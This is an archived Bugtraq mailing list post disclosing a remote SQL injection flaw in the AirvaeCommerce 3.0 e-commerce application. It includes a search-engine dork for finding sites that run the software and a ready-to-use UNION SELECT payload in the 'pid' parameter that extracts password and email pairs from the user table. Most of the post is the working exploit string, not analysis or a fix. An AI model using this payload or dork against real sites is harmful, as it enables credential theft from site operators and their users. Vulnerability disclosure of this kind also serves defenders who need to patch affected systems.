bugtraq June 2008 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: Remote SQL Injection

Remote SQL Injection

From: <saidmoftakhar_at_nospam>
Date: Sat Jun 28 2008 - 17:33:49 GMT
To: bugtraq@securityfocus.com
('binary' encoding is not supported, stored as-is)
Author :: Dr-Linux saidmoftakhar(at)gmx(dot)de Application :: AirvaeCommerce 3.0
Download :: http://www.airvaecommerce.com Dork 1 :: powered by AirvaeCommerce 3.0 --------------------------------------------[C o n t e x t]-----------------------------------------

Vulnerability: http://localhost/ path script / ?p=vzh&pid= [SQL] Example : /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

           ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/*

Note : Some site used SELECT statements have a different number of columns about 45 .   -------------------------------------------[End of context]----------------------------------------